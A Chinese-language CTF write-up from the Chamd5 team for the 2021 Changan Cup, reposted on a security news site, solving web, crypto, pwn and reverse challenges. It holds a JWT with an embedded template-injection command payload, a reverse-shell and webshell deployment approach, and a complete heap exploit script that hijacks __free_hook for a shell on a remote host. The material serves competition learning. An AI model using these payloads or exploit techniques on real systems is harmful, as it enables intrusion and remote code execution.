酷应用

长安杯-WriteUp

百家 作者:Chamd5安全团队 2021-09-27 10:57:57

Web

|??soeasy

解题思路

监听6666端口反弹shell


|??ezpy

解题思路

对token字段解密发现是jwt

jwt 爆破密钥 CTf4r

jwt用户名处模板注入

Payload

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoie3t1cmxfZm9yLl9fZ2xvYmFsc19fLm9zLnBvcGVuKHJlcXVlc3QuYXJncy5jbWQpLnJlYWQoKX19IiwicGFzc3dkIjoiMTIzIiwicm9sZSI6ImFkbWluIiwidWlkIjoiIn0.KWHbwpGOiRZvRZxbdibiqK5C636QHuVnhUHVz_CDYD0


?|??Old?But?A?Little?New

解题思路
后台弱口令admin/admin
将冰蝎shell打包成war部署拿shell


?|??asuka

解法同Old But A Little New。


Crypto

?|??easyRSA

解题思路

先获取所有p,q十进制的组合,然后爆破组合根据n的低位判断是否合法,还原p,q

from?Crypto.Util.number?import?*
#?from?secret?import?flag

def?add(a,b):
????if(a<b):
????????a0?=?str(b).encode()
????????b0?=?str(a).encode()
????else:
????????a0?=?str(a).encode()
????????b0?=?str(b).encode()
????ans?=?0
????#?b0?<?a0
????for?i?in?range(len(a0)-len(b0)):
????????ans?=?ans*10+a0[i]-48
????for?i?in?range(len(b0)):
????????ans?=?ans*10+(a0[i+len(a0)-len(b0)]+b0[i]+4)%10
????return?ans

def?mul(a,b):
????if(a<b):
????????a0?=?str(b).encode()
????????b0?=?str(a).encode()
????else:
????????a0?=?str(a).encode()
????????b0?=?str(b).encode()
????ans?=?0
????for?i?in?range(len(b0)):
????????ans?=?ans*10+((a0[i+len(a0)-len(b0)]+2)*(b0[i]+2))%10
????return?ans

def?collect(m):
????res?=?[]
????while?m:
????????res.append(m%10)
????????m?//=?10
????res?=?res[::-1]
????return?res

def?solve(a,b):
????x_add_y?=?(a-4)%10
????x_mul_y?=?(b+4-2*a)%10
????ans?=?[]
????for?x?in?range(48,58):
????????for?y?in?range(48,58):
????????????if?(x+y)%10?==?x_add_y?and?(x*y)%10?==?x_mul_y:
????????????????ans.append((x-48,y-48))
????return?ans


e?=?65537

n?=?100457237809578238448997689590363740025639066957321554834356116114019566855447194466985968666777662995007348443263561295712530012665535942780881309520544097928921920784417859632308854225762469971326925931642031846400402355926637518199130760304347996335637140724757568332604740023000379088112644537238901495181
p_add_q?=?10399034381787849923326924881454040531711492204619924608227265350044149907274051734345037676383421545973249148286183660679683016947030357640361405556516408
p_mul_q?=?6004903250672248020273453078045186428048881010508070095760634049430058892705564009054400328070528434060550830050010084328522605000400260581038846465000861
info1?=?(collect(p_add_q))
info2?=?(collect(p_mul_q))
guess?=?[0]
info1?=?info1[1:]
cnt?=?1
ans?=?0
ans_p?=?[0]
ans_q?=?[0]
for?i?in?range(len(info1)-1,-1,-1):
????a?=?info1[i]
????b?=?info2[i]
????poss?=?solve(a,b)
????print(poss)
????pp_ans?=?[]
????qq_ans?=?[]
????for?index?in?range(len(ans_p)):

????????pp?=?ans_p[index]
????????qq?=?ans_q[index]
????????for?x,?y?in?poss:
????????????print(x,y)
????????????nans_p?=?pp+x*(10**(cnt-1))
????????????nans_q?=?qq+y*(10**(cnt-1))
????????????print("cur",nans_p,nans_q)
????????????if?(nans_p?*?nans_q)%(10**cnt)?==?n%(10**cnt):
????????????????pp_ans.append(nans_p)
????????????????qq_ans.append(nans_q)
????????????????print("yes!!!",pp_ans,qq_ans)
????????????????print("qq_ans",qq_ans)
????????????????print("pp_ans",pp_ans)
????????????????#?break
????if?pp_ans:
????????ans_p?=?pp_ans
????????ans_q?=?qq_ans
????print("ans",ans_p,ans_q)

????cnt?+=?1

from?Crypto.Util.number?import?*
for?p?in?ans_p:
????if?isPrime(p):
????????print(p)

p?=?8307103755174226983699771812499382664784661030503034013965679561410051699975573257899430944515587916063550418050690024796566861042630720583592848475010689
q?=?n//p
phi?=?(p-1)*(q-1)
d?=?inverse(65537,phi)
c?=?49042009464540753864186870038605696433949255281829439530955555557471951265762643642510403828448619593655860548966001304965902133517879714352191832895783859451396658166132732818620715968231113019681486494621363269268257297512939412717227009564539512793374347236183475339558666141579267673676878540943373877937

print(long_to_bytes(pow(c,d,n))


Pwn

?|??baigei

解题思路

from?pwn?import?*
sh=remote('113.201.14.253',21111)
libc=ELF('libc-2.27.so')
context(arch='amd64',?os='linux')
context.log_level='debug'


def?add(idx,size,con):
????sh.recvuntil('>>')
????sh.sendline('1')
????sh.recvuntil('idx?')
????sh.sendline(str(idx))
????sh.recvuntil('size?')
????sh.sendline(str(size))
????sh.recvuntil('content?')
????sh.send(con)
def?delete(idx):
????sh.recvuntil('>>')
????sh.sendline('2')
????sh.recvuntil('idx?')
????sh.sendline(str(idx))
def?edit(idx,size,con):
????sh.recvuntil('>>')
????sh.sendline('3')
????sh.recvuntil('idx?')
????sh.sendline(str(idx))
????sh.recvuntil('size?')
????sh.sendline(str(size))
????sh.recvuntil('content?')
????sh.send(con)
def?show(idx):
????sh.recvuntil('>>')
????sh.sendline('4')
????sh.recvuntil('idx?')
????sh.sendline(str(idx))
add(0,0x28,'a')
add(1,0x400,'a')
add(2,0x68,'a')
add(3,0x68,'a')
add(4,0x50,'/bin/sh\x00')
sh.recvuntil('>>')
sh.sendline('1')
sh.recvuntil('idx?')
sh.sendline('0')
sh.recvuntil('size?')
sh.sendline('-1')

edit(0,0x10000,p64(0)*5+p64(0x411+0x70*2))
delete(1)
add(1,0x400,'a')
show(2)
libc.address=u64(sh.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-96-libc.sym['__malloc_hook']-0x10
print?hex(libc.address)
delete(3)
add(1,0x90,0x68*'\x00'+p64(0x71)+p64(libc.sym['__free_hook']))
add(2,0x60,'a')
add(2,0x60,p64(libc.sym['system']))
delete(4)
sh.interactive()


Reverse

?|??snake

解题思路

当到200波时会给flag

猜测这里是吃果子 每吃一个减一

如果这里--v82直接变成v82=0

那么每轮只要吃一个果子就可以进入下一关

直接patch

这样v82就会直接变成0 然后吃200个果子即可


end


招新小广告

ChaMd5?Venom?招收大佬入圈

新成立组IOT+工控+样本分析?长期招新

欢迎联系admin@chamd5.org



关注公众号:拾黑(shiheibook)了解更多

[广告]赞助链接:

四季很好,只要有你,文娱排行榜:https://www.yaopaiming.com/
让资讯触达的更精准有趣:https://www.0xu.cn/

*文章为作者独立观点,不代表 爱尖刀 立场
本文由 Chamd5安全团队发表,转载此文章须经作者同意,并请附上出处( 爱尖刀 )及本页链接。
原文链接 https://www.ijiandao.com/2b/baijia/416058.html
WriteUp 长安杯
图库
Chamd5安全团队 Chamd5安全团队
公众号 关注网络尖刀微信公众号
随时掌握互联网精彩
赞助链接
百度热搜榜
排名 热点 搜索指数
iTrust
AiDeep Ued
关于我们 联系我们 升级日志 法律声明 广告服务 侵删通道
Copyright © 2021 K2CMS All rights reserved.
京ICP备14006288号